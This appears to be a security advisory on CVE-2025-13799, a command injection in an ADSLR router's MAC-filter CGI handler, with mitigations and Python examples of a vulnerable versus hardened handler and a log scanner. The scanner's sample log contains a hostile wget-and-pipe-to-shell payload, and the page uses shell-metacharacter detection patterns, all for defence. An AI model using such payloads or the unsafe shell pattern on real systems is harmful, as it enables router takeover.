CVE-2025-13799: Command Injection in ADSLR NBR1005GPEV2
A vulnerability has been found in ADSLR NBR1005GPEV2 250814-r037c. This vulnerability affects the function ap_macfilter_del of the file /send_order.cgi. The manipulation of the argument mac leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
AI Analysis
Technical Summary
CVE-2025-13799 is a command injection vulnerability in the ADSLR NBR1005GPEV2 router, firmware version 250814-r037c. The flaw is in the ap_macfilter_del function reached through the /send_order.cgi endpoint: the mac parameter is passed into an OS command without adequate sanitization, so an attacker who can reach the web interface can append shell metacharacters to an otherwise valid MAC address and run arbitrary commands on the device. The vendor description states only that the attack can be initiated remotely; it does not say whether a valid session is required, so any device whose web interface is reachable from an untrusted network should be treated as exposed. The reporter contacted the vendor, who has neither responded nor released a fix. The CVSS 4.0 score of 5.3 (medium) reflects a network-reachable, low-complexity attack with impact rated low for each of confidentiality, integrity and availability. That rating understates what command execution on a router usually means in practice: the injected commands run with the privileges of the CGI process, which on embedded devices is frequently root, and a foothold on the gateway allows traffic manipulation, persistence and pivoting into the internal network. A public exploit has been disclosed; exploitation in the wild has not been reported on this page, but the disclosure lowers the bar for opportunistic attackers. The NBR1005GPEV2 appears to be a small-office or residential gateway, which in many deployments is the only boundary device, so the absence of a patch calls for immediate compensating controls.
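To make the bug class concrete, here is an added Python example (not firmware code from ADSLR, whose handler has not been published) showing the unsafe pattern an ap_macfilter_del-style handler falls into beside a hardened version. The filter binary, its arguments and the accepted MAC format are assumptions; echo stands in for the real command so the code runs on any host and the shell's view of the injected value is visible in the output.

```python
import re
import subprocess

# Allow-list for the mac parameter: six hex octets separated by colons. This is an
# assumption about what ap_macfilter_del should accept; the firmware's rule is unknown.
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")

# Stand-in for whatever filter binary the firmware calls (not published). 'echo' just
# prints its arguments, so the example runs anywhere and shows what the shell executed.
FILTER_CMD = "echo"


def validate_mac(mac: str) -> bool:
    """True only for a canonical MAC; fullmatch also rejects trailing newlines."""
    return MAC_RE.fullmatch(mac) is not None


def vulnerable_del(mac: str) -> str:
    """The unsafe pattern: the request parameter is spliced into a shell command line.
    Returns everything the shell printed so the effect of an injection is visible."""
    cmd = f"{FILTER_CMD} ap_macfilter_del --mac {mac}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_del(mac: str) -> str:
    """The fix: allow-list validation first, then exec an argv list with no shell.
    Even a value that slipped past validation could not split into a second command."""
    if not validate_mac(mac):
        raise ValueError(f"rejected mac parameter: {mac!r}")
    argv = [FILTER_CMD, "ap_macfilter_del", "--mac", mac.lower()]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    benign = "00:11:22:33:44:55"
    # Two constructed hostile values: a command separator, and command substitution.
    hostile = ["00:11:22:33:44:55; echo INJECTED", "$(echo INJECTED)"]
    print(vulnerable_del(benign), end="")
    for h in hostile:
        print(vulnerable_del(h), end="")  # INJECTED appears: attacker-chosen code ran
        try:
            hardened_del(h)
        except ValueError as exc:
            print("hardened handler:", exc)
    print(hardened_del(benign), end="")
```

The two defences are deliberately layered: the allow-list is the primary control, and the argv form means that even an unexpected character would reach the filter binary as a single argument rather than as shell syntax.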
Potential Impact
For European organizations, this vulnerability poses a risk of unauthorized remote command execution on affected ADSLR NBR1005GPEV2 routers. Successful exploitation could lead to device takeover, allowing attackers to manipulate or intercept traffic, disrupt connectivity, or use the router as a foothold for further attacks on the internal network. This is most concerning for organizations that rely on these routers for critical communications or that have the management interface exposed to the internet. The medium severity score reflects impacts rated low on confidentiality, integrity and availability, but because the attack needs only network reach to the web interface, exposure of that interface is the decisive factor in how likely exploitation is. With no vendor patch available, organizations must rely on network-level mitigations or device replacement to reduce risk. Disruption or compromise of network infrastructure could affect business continuity, data privacy compliance and operational security, especially in sectors such as finance, healthcare and government within Europe.
Mitigation Recommendations
1. Identify and inventory every ADSLR NBR1005GPEV2 on the network and record its firmware version; 250814-r037c is the only version named, but no fixed version is known, so treat other versions as suspect until the vendor states otherwise.
2. Remove the web management interface from untrusted networks: disable WAN-side management and add firewall rules so that only an administration VLAN or jump host can reach the router's HTTP(S) port. Ordinary packet-filtering firewalls cannot match on a URL path, so a rule that "blocks /send_order.cgi" only works on a reverse proxy or WAF placed in front of the device; blocking the interface as a whole is the reliable control.
3. Disabling the MAC filtering feature removes the normal reason to call ap_macfilter_del, but it does not necessarily remove the CGI handler, so do not rely on it as the sole mitigation.
4. Monitor for exploitation: requests to /send_order.cgi whose mac value contains anything other than a MAC address, and unexpected outbound connections from the router (file downloads, reverse shells, DNS lookups for unfamiliar domains).
5. If a newer firmware becomes available, apply it once the vendor confirms the issue is fixed; if no patch appears, plan device replacement.
6. Where an IDS/IPS or WAF sits in front of the device, add a signature for shell metacharacters in the mac parameter of requests to /send_order.cgi.
7. Brief IT staff and include router compromise in incident response playbooks (isolation, rotation of any credentials the router could observe, re-imaging the configuration from a known-good baseline).
8. Periodically review device configurations to confirm management interfaces have not been re-exposed.
9. Ask ADSLR for a fix and track third-party advisories for workarounds.
10. Use network-level anomaly detection to identify lateral movement or unusual traffic originating from the router.
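As an added example for the monitoring and IDS steps above (not from the page or the vendor), the following Python scans web-server access logs for suspicious requests to /send_order.cgi. The common log format, the assumption that mac arrives as a GET query parameter and the sample lines are all constructed; if the firmware takes the parameter in a POST body, an access log never shows it, so the scanner flags such requests for review against a packet capture or an inline proxy log.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Common-log-format line: client, identity, user, [timestamp], "METHOD target proto", status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")
# Characters that let a value escape a shell word: separators, pipes, substitution, redirection.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")

ENDPOINT = "/send_order.cgi"
REASON_META = "shell metacharacters in mac"
REASON_FORMAT = "mac parameter is not a MAC address"
REASON_BODY = "POST without query string; parameter only visible in body or packet capture"

# Constructed sample lines, not real traffic; the second carries a stager-style payload.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Dec/2025:02:10:11 +0000] "GET /send_order.cgi?mac=00:11:22:33:44:55 HTTP/1.1" 200 51
203.0.113.7 - - [01/Dec/2025:02:10:12 +0000] "GET /send_order.cgi?mac=00:11:22:33:44:55%3Bwget%20http://203.0.113.9/x.sh%7Csh HTTP/1.1" 200 51
198.51.100.4 - - [01/Dec/2025:02:11:40 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.7 - - [01/Dec/2025:02:12:03 +0000] "POST /send_order.cgi HTTP/1.1" 200 51
"""


def query_values(query: str, name: str) -> list:
    """Decode the query string by hand so ';' inside a value is never treated as a
    separator (older parse_qs versions split on it, hiding exactly the injection we want)."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            values.append(unquote_plus(value))
    return values


def scan_log(text: str) -> list:
    """Return one finding per suspicious request to the vulnerable endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != ENDPOINT:
            continue
        base = {"src": m.group("src"), "ts": m.group("ts"), "value": None}
        if m.group("method") == "POST" and not parts.query:
            findings.append({**base, "reason": REASON_BODY})
            continue
        for mac in query_values(parts.query, "mac"):
            if SHELL_META.search(mac):
                findings.append({**base, "reason": REASON_META, "value": mac})
            elif MAC_RE.fullmatch(mac) is None:
                findings.append({**base, "reason": REASON_FORMAT, "value": mac})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['reason']}: {f['value']!r}")
```

The router itself is unlikely to offer a usable access log, so in practice this logic runs over the logs of a reverse proxy or WAF placed in front of the management interface, or as a signature in an IDS that sees the decrypted request; the value check is the same in each case.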
Affected Countries
Germany, France, Italy, Spain, United Kingdom
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulDB
- Date Reserved: 2025-11-30T13:58:34.486Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 692cebc9a0d303b752b9851e
Added to database: 12/1/2025, 1:13:45 AM
Last enriched: 12/1/2025, 1:28:23 AM
Last updated: 12/5/2025, 1:44:34 AM